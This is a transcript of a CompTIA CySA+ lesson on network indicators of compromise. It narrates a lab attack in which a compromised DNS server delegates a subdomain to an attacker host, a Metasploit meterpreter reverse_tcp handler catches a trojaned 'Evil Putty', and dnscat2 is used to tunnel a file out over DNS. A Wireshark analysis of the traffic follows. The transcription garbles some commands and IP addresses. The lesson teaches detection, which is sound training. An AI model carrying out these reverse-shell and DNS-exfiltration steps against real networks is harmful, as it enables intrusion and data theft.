CompTIA CYSA+ CS0-002 – Analyzing Network IOCs Part 6

13. Analysis of Network IOCs (OBJ 4.3)

Analysis of network IOCs. In this lesson we’re going to talk about analyzing network related indicators of compromise. Now, when we look at this, a lot of our network activity is going to be used as some of the best sources of indicators when we’re trying to analyze a compromise of a suspected incident. Now in this lesson, what I’m going to do is I’m going to set up a simple DNS tunneling mechanism. This will help us illustrate how a task hackers can disguise their communications by using covert channels such as DNS to hide information within that common protocol. To do this, I’m going to go into my lab environment and from here I’m going to go ahead and set up my attack. Now to perform this attack is really something more that’s focused on the Pen test plus side.

But I’m going to show you how I do this because it’s important for us to be able to see this. So as defenders we know what the attacker is doing. And then I’m going to show you how you can identify this as a defender. Now, when I set up my DNS tunneling, I need to act as an authoritative name server. That way queries for name records are going to be directed to my machine as the attacker instead of to some really trusted domain server. To do this, we can use lots of different techniques. For instance, we’ve talked about DGAs which is domain generate algorithms that rapidly cycle through different domain names. This might be something like a fast flux DNS for instance. Now my approach here is going to be to compromise the records on another name server.

Now this name server is going to be hosted on a Lamp server, which stands for Linux, Apache, MySQL and PHP. And so I’m going to attack this Lamp server and create a delegation for a subdomain. Now, because this isn’t really going to be a course on learning how to attack things, I’m going to simplify things and assume that I’ve gotten the administrative credentials somehow. Maybe I had a wireless sniffer and I was able to capture that. Whatever it is, I’m going to log in as the admin so I can do this set up. Now when I get here to the command prompt, I want to go ahead and change into the etcbindirectory. Once I’m there, I’m going to use pseudo, then move the file named Co NF local bak to named CNF local. This will rename my backup file into my new local file.

That backup file is one that I’ve already configured with the things that I needed to be able to run this attack. Now the first thing I need to do is I need to change the DNS records. And what I’m going to do is I’m going to go and use the pseudo command, then nano named CNF options, which is the file that contains those DNS records. I’m going to go down and edit and add the following two lines. I’m going to go and type in DNS SEC validation, no semicolon, and then allow recursion any and semicolon. By doing this, I’m going to configure this DNS server to allow us to have the exploit happening. Now I’m going to hit control. O and enter. That’s going to save the file and then Control X and Enter to close the file.

Now that I’ve done that, I need to go ahead and open up the DNS records and be able to modify those. So I’m going to type in pseudo nanodb dot five one five web. net. Now I can add the following records into this to give them delegation records. I’m going to create my own subdomain called pawn PWN, and I’m going to do that by using origin pawn five one five net and then at innsns one PWN five one five net, which says I want to set up a name server, NS one, pawn five one five web net. And then I’m going to set up NS one, that name server with an A record of 192, 168, 2192, which is the IP address of my attacker’s machine. Then I’m going to go ahead and save this using Control O and hitting Enter and then Control X to close the file.

Next I want to restart the bind server. To do this, I’m going to type in pseudo, then service, then bind nine, and then restart and hit Enter. All right, so now we have set up that name server on my attacker’s machine. Now, what does my lab actually look like, you might wonder? Well, here’s what my lab looks like. Now notice I have that Lamp server in the bottom left. It’s at 192 168 one one. That is the Linux Apache MySQL and PHP. That’s the server whose records I just compromised and said that the name server is now going to be located over at 192 dot 168, dot two, dot 192, which is my Linux machine that I’m running these attacks from. So now anytime somebody tries to send information to pawn dot five one five web dotnet, it’s going to be able to send it instead of to that Lamp server, which is the authoritative source for all five one five web net DNS over to that Kali Linux server.

But that Kali Linux server doesn’t have a listener yet, so let’s go ahead and set that up. We need to set up a server to listen for connection attempts, and that way anytime somebody looks for a record at pawn five one five web net, it’s there to answer to it. Now what we’re going to use here is DNS cat two, which is a tunneling tool to allow us to tunnel information over DNS. So once I’m on my attacker’s workstation, I’m going to go ahead and go into the terminal and type in service Apache two Start, which is going to start up my web service. Then I’m going to change directories into the downloadsdnscat twoserverdirectory. And from here I’m going to use Ruby to execute the file dnscat two RB, which is a Ruby script and the domain name that I want to use in this case PWN five one five, web net.

At this point we need to be able to start sending the client to the victim machine. And so we’re going to use Evil Putty to be able to do this. So I’m going to open up a new terminal window and I’m going to type in MSF console, which stands for the Metasploit Framework. This is an attacker and penetration tool that we can use as a red teamer. So using Metasploit, we’re going to go ahead and type in usexploit slash multi slash handler, which says what exploit do I want to use? Then I’m going to set my payload, and I do this by typing in setpayload Windows Meterpreter, reverse TCP. And then I’m going to set my local host, which is who is going to be listening to this information. Setlhost 109 2168-2192, which is the IP of my Kali Linux machine.

And then I’m going to set the port that I want to listen on, in this case set Lport 3389, which is RDP or Remote Desktop Protocol. This is how you configure an exploit. These four lines are just the configuration to allow this exploit to run. And now if I want to run that exploit, I’m just going to type in Exploit and hit Enter. And that is going to start this Listener up. All right, so now we want to see what this attack looks like. I’ve set up the listener I’ve set the DNS rerouting let’s go ahead and trigger the attack. So now I’m going to log into my machine as an analyst and I’m going to start Wireshark. Now with wireshark, I want to capture the Ethernet interface and I’m going to start looking for a machine that says Host not ten 10 one, and the port is 3389 or port 53.

So what am I looking for here? Basically any host that is communicating with port 3389, that RDP port I just set up or port 53, which is DNS. Now I’m going to open up a browser. I’m going to try going to a website, for instance, 192, 168, 2192. Now why am I doing that? Because this is going to allow me to start running Evil Putty, and I can click through any warnings I have. Now let me go back to my attacker machine. At this point, if we’ve run Evil Putty, we now have a connection with that Listener I just set up. So on my penetration testing machine, I’m going to upload routedownloadsdnscat two exe and I’m going to put that into C lab files.

Now I’m going to type in Shell and then I’m going to do Cdclabfiles. Now this means that I have a command shell and I’m now in that directory. So I can now run Dnscat two I type in Dnscat two exe DNS space domain equals PWN five one five web net comma server equals 192, 168 one one. Now, what did I just do here? Well, I just set up the executable on my victim’s machine. This allows data to start being sent over DNS cat, which is that DNS tunneling protocol that we’re going to send information over back to the Kali Linux machine. So let’s go back over and look at DNS cat two. And you’ll notice here we have a new window that was created.

This session is now encrypted and we have a good communication between the victim, in this case the Bobby PC I logged into before with Windows and the Linux machine that I’m using as an attacker. Now let’s go ahead and look back at Meterpreter. And here I can go ahead and hit Control Z and respond to the prompt by saying yes to turn off that connection, that listener, because I don’t need it anymore. I already have a tunnel now between this system and the victim system. So I’m going to go ahead and quit Meterpreter and I do that by typing in Exit and then exit again. Now let’s switch to the terminal that’s hosting DNS cat two. Again. From here I’m going to run a couple of commands to navigate the local system. First, I’m going to type in window space.

I equals one and hit enter. And then I’m going to type in Shell. And then I’m going to hit enter. Then I’m going to type in window space. I equals two and hit enter. And then I’m going to type in Dir and hit Enter. Now, what did I do here? Well, I set up two windows or two environments for me to send information. I call these windows One and Windows two. The shell is giving me a command shell on a Windows system. And then the second one I did a Dir or a directory listing. Now let’s say that the GPO zip file is of interest here. Let’s say I wanted to grab that. Well, I can use this DNS tunnel to start downloading that GPO file. I can do this by exiting the local shell by typing in Exit and hitting Enter and then going Window I equals one and this again goes back to that first interface window.

And then I can say download the file name GPO zip and where I want to download to root downloadsgpo zip. Now, when I had that shell I can go and do any commands I want. But because I exited that shell, I’m now issuing specific commands back to that Windows machine. In this case, the download command should just take a couple of seconds. And now I have the file. So let’s now go in and look at the indicators of compromise here by analyzing our attack indicators. First we’re going to go back into our analyst machine which is PC One. From here I’m going to stop the wireshark capture. And I’m going to scroll to the start of the output here. You can observe the meterpreter session was established over port 3389. Now, this is a very common port from Microsoft’s Remote Desktop Protocol service.

And so you should be used to seeing RDP traffic on a normal network. So this may not look abnormal to you at first, but the data transferred here is being done using raw TCP packets. As we start looking at the end of that capture, we can start seeing that DNS tunneling traffic. Now, there’s lots of different records that are being used here, and the reason for that is because we’re actually tunneling information through these DNS requests. Now, if I have a firewall, I can get right through that firewall because DNS is usually allowed to exit the network over port 53 to make those calls and request DNS information so you know which websites to go to.

And so that’s why attackers like to use this DNS tunneling technique. Now, the way we can know this is a technique of some kind of indicator of compromise is because all of those different records are being seen. And if we went and looked at those individual records, we can actually look at the data inside them and we’ll find that it’s not the data inside a normal DNS record. Instead, it’s data we’re throwing in there to tunnel through that protocol. Now, if you’re using an intrusion detection system on your network, it should be able to find this information quite quickly because these are not properly format DNS messages. Instead, we’re packing extra information into those DNS requests to get that information exfiltrated out of the network.

All right, I hope you enjoyed this lesson, and you enjoyed seeing just one of the many attacks that people can use against your networks. Now, remember, as a cybersecurity analyst, it’s your job to understand what these attacks look like by looking at things like wireshark and packet captures, because that is going to be one of the main things you’re going to be looking at as you’re going through and working on a sock watch floor. In addition to that, you’ll also be looking at seams and intrusion detection systems. So those things will help you out because you have specific alerts that will detect these type of things that would flag. And then you can go into more depth by pulling up the packet captures.